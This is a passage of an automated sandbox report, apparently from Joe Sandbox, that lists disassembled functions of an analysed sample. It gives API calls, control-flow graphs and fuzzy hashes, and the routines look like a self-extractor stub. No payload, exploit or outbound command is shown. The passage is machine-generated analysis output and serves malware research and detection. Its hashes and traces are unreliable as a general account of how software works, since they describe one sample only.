                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0
                                                                                        • Opcode ID: ddc19426935c2145ac9c2a6bff217af6bd656638abd736c4ca2bf4949adbfcf2
                                                                                        • Instruction ID: 80b8e0f9efdbba632a690e0be620f6973ff0bc4b403824fe2c8b463968dff077
                                                                                        • Opcode Fuzzy Hash: ddc19426935c2145ac9c2a6bff217af6bd656638abd736c4ca2bf4949adbfcf2
                                                                                        • Instruction Fuzzy Hash: 2051E372600B16ABFB27AF64CC41EBBB7AAEB40710F1646AAFD04DA140DB34DD50D791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                          • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        • OleInitialize.OLE32(00000000), ref: 0037AC2F
                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
                                                                                        • SHGetMalloc.SHELL32(003A8438), ref: 0037AC70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                        • String ID: riched20.dll$3To
                                                                                        • API String ID: 3498096277-2168385784
                                                                                        • Opcode ID: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
                                                                                        • Instruction ID: db1a4af10e01ae9713f566a3de35d433c9a3e15537922988a7885103ea9e13db
                                                                                        • Opcode Fuzzy Hash: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
                                                                                        • Instruction Fuzzy Hash: 3AF01DB5D00219ABCB11AFAAD849DEFFFFCEF85700F00815AE415E2241DBB856058FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003698E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1000 3698e0-369901 call 37ec50 1003 369903-369906 1000->1003 1004 36990c 1000->1004 1003->1004 1006 369908-36990a 1003->1006 1005 36990e-36991f 1004->1005 1007 369927-369931 1005->1007 1008 369921 1005->1008 1006->1005 1009 369936-369943 call 366edb 1007->1009 1010 369933 1007->1010 1008->1007 1013 369945 1009->1013 1014 36994b-36996a CreateFileW 1009->1014 1010->1009 1013->1014 1015 36996c-36998e GetLastError call 36bb03 1014->1015 1016 3699bb-3699bf 1014->1016 1019 3699c8-3699cd 1015->1019 1025 369990-3699b3 CreateFileW GetLastError 1015->1025 1018 3699c3-3699c6 1016->1018 1018->1019 1020 3699d9-3699de 1018->1020 1019->1020 1022 3699cf 1019->1022 1023 3699e0-3699e3 1020->1023 1024 3699ff-369a10 1020->1024 1022->1020 1023->1024 1026 3699e5-3699f9 SetFileTime 1023->1026 1027 369a12-369a2a call 370602 1024->1027 1028 369a2e-369a39 1024->1028 1025->1018 1029 3699b5-3699b9 1025->1029 1026->1024 1027->1028 1029->1018
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00367760,?,00000005,?,00000011), ref: 0036995F
                                                                                        • GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036996C
                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00367760,?,00000005,?), ref: 003699A2
                                                                                        • GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699AA
                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                        • String ID:
                                                                                        • API String ID: 1999340476-0
                                                                                        • Opcode ID: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
                                                                                        • Instruction ID: 73e231b0c3446b0a6055954c9f7d091fe51d259c73c9923745a36b87ac5a5ced
                                                                                        • Opcode Fuzzy Hash: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
                                                                                        • Instruction Fuzzy Hash: BC315730544745AFE7329F20CC46BEABBDCBB05320F214B1EF9A1962C4D3B5A954CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1059 37b568-37b581 PeekMessageW 1060 37b583-37b597 GetMessageW 1059->1060 1061 37b5bc-37b5be 1059->1061 1062 37b599-37b5a6 IsDialogMessageW 1060->1062 1063 37b5a8-37b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                        • IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                        • TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                        • DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1266772231-0
                                                                                        • Opcode ID: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
                                                                                        • Instruction ID: 90fc68871fbf0b2a5b372c8a7bdc0d7b76696edab0c721987caa6ce8f69f7140
                                                                                        • Opcode Fuzzy Hash: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
                                                                                        • Instruction Fuzzy Hash: 0EF09B72E01129BBCB21ABE6DC4CDEBBFBCEE05755B408415B51AD2050EB78E605CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1064 37abab-37abca GetClassNameW 1065 37abf2-37abf4 1064->1065 1066 37abcc-37abe1 call 371fbb 1064->1066 1068 37abf6-37abf9 SHAutoComplete 1065->1068 1069 37abff-37ac01 1065->1069 1071 37abe3-37abef FindWindowExW 1066->1071 1072 37abf1 1066->1072 1068->1069 1071->1072 1072->1065
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 0037ABC2
                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0037ABF9
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0037ABE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                        • String ID: EDIT
                                                                                        • API String ID: 4243998846-3080729518
                                                                                        • Opcode ID: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
                                                                                        • Instruction ID: 32735b16bdbb3ae793bb6a85f9ac98d3705dbb24da5ef0637dcb757d9570b23f
                                                                                        • Opcode Fuzzy Hash: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
                                                                                        • Instruction Fuzzy Hash: A1F08233601628B6DB3257649C09F9F766C9B86B40F498011BA49E6180D764EA4186B6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1073 37dbde-37dc09 call 37ec50 SetEnvironmentVariableW call 370371 1077 37dc0e-37dc12 1073->1077 1078 37dc36-37dc38 1077->1078 1079 37dc14-37dc18 1077->1079 1080 37dc21-37dc28 call 37048d 1079->1080 1083 37dc1a-37dc20 1080->1083 1084 37dc2a-37dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                        APIs
                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID: sfxcmd$sfxpar
                                                                                        • API String ID: 1431749950-3493335439
                                                                                        • Opcode ID: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
                                                                                        • Instruction ID: 29e16d11330bc9cb8d5e60565f51ee244c81ab2deff4864637d489bfb4a61f46
                                                                                        • Opcode Fuzzy Hash: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
                                                                                        • Instruction Fuzzy Hash: 49F0ECB2404225A7DF333F958C46BFA376CAF04785B044455FD8D99161E6B98980D7B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1085 369785-369791 1086 369793-36979b GetStdHandle 1085->1086 1087 36979e-3697b5 ReadFile 1085->1087 1086->1087 1088 3697b7-3697c0 call 3698bc 1087->1088 1089 369811 1087->1089 1093 3697c2-3697ca 1088->1093 1094 3697d9-3697dd 1088->1094 1091 369814-369817 1089->1091 1093->1094 1095 3697cc 1093->1095 1096 3697ee-3697f2 1094->1096 1097 3697df-3697e8 GetLastError 1094->1097 1098 3697cd-3697d7 call 369785 1095->1098 1100 3697f4-3697fc 1096->1100 1101 36980c-36980f 1096->1101 1097->1096 1099 3697ea-3697ec 1097->1099 1098->1091 1099->1091 1100->1101 1103 3697fe-369807 GetLastError 1100->1103 1101->1091 1103->1101 1105 369809-36980a 1103->1105 1105->1098
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00369795
                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003697AD
                                                                                        • GetLastError.KERNEL32 ref: 003697DF
                                                                                        • GetLastError.KERNEL32 ref: 003697FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                        • String ID:
                                                                                        • API String ID: 2244327787-0
                                                                                        • Opcode ID: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
                                                                                        • Instruction ID: 967dc699e623174b825fd429787f518f1266d0e1be50430a78f28f718e414137
                                                                                        • Opcode Fuzzy Hash: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
                                                                                        • Instruction Fuzzy Hash: 74117C30910204EBDF225F64C804B693BADBB52364F11C92BE42786698D7759E44DB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,003840EF,00000000,00000000,?,0038ACDB,003840EF,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue), ref: 0038AD66
                                                                                        • GetLastError.KERNEL32(?,0038ACDB,003840EF,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000,00000364,?,003898B7), ref: 0038AD72
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038ACDB,003840EF,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000), ref: 0038AD80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
                                                                                        • Instruction ID: 65505b8a6308959c17af99b6e6f987517b94ab0bba0fbef81e1efc3fda9e50e0
                                                                                        • Opcode Fuzzy Hash: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
                                                                                        • Instruction Fuzzy Hash: 49014736201B22ABD7235B68DC54A977B9CEF017A2B220662F906D3660C722DC09C7E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1098,00384674,003A1098,?,?,003840EF,?,?,003A1098), ref: 003897E9
                                                                                          • Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
                                                                                          • Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1098), ref: 0038985D
                                                                                          • Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863
                                                                                          • Part of subcall function 0038BB4E: _abort.LIBCMT ref: 0038BB80
                                                                                          • Part of subcall function 0038BB4E: _free.LIBCMT ref: 0038BBB4
                                                                                          • Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6
                                                                                        • _free.LIBCMT ref: 0038BA9F
                                                                                        • _free.LIBCMT ref: 0038BAD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorLast_abort
                                                                                        • String ID: p9
                                                                                        • API String ID: 2991157371-1904256876
                                                                                        • Opcode ID: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
                                                                                        • Instruction ID: 62eea3126074b3945908e62a9fa0cd2e2dcd882ad07054224f9047ec0b8eaaa7
                                                                                        • Opcode Fuzzy Hash: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
                                                                                        • Instruction Fuzzy Hash: A531813190434AAFDB16FFA8D441BADB7E5EF40320F2540DAE5149B2A2EB369D41DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00371043
                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 0037108A
                                                                                          • Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54
                                                                                          • Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E0A
                                                                                          • Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                        • String ID: CreateThread failed
                                                                                        • API String ID: 2706921342-3849766595
                                                                                        • Opcode ID: a92ba2e32fcf3ec33d99d3ceb8c0fa08b8680a799f80d8ff7d32dd09c3926542
                                                                                        • Instruction ID: 8111aeb1f1fb66788c6c5d643f070ed42a21f2646c2df8c805eceb0b8759c50e
                                                                                        • Opcode Fuzzy Hash: a92ba2e32fcf3ec33d99d3ceb8c0fa08b8680a799f80d8ff7d32dd09c3926542
                                                                                        • Instruction Fuzzy Hash: FE01AEB63443496FD7379F689C92F77735CEB41751F10402EF58756284CEA16C854624
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 27$PDu<7
                                                                                        • API String ID: 1269201914-895419741
                                                                                        • Opcode ID: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
                                                                                        • Instruction ID: e754d97d50ddcf497246f5aecd55ba9d29706f674bd3a98891bee039a0d429ff
                                                                                        • Opcode Fuzzy Hash: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
                                                                                        • Instruction Fuzzy Hash: 0FB012CB2680007D321761081D02F7B021CC0CAF20330D06EF42DC4480E8444C000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: (7$PDu<7
                                                                                        • API String ID: 1269201914-270680953
                                                                                        • Opcode ID: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
                                                                                        • Instruction ID: e6849191d093bfce8e9202c78f756fff82d87949da97d0c262123808e55bb0cc
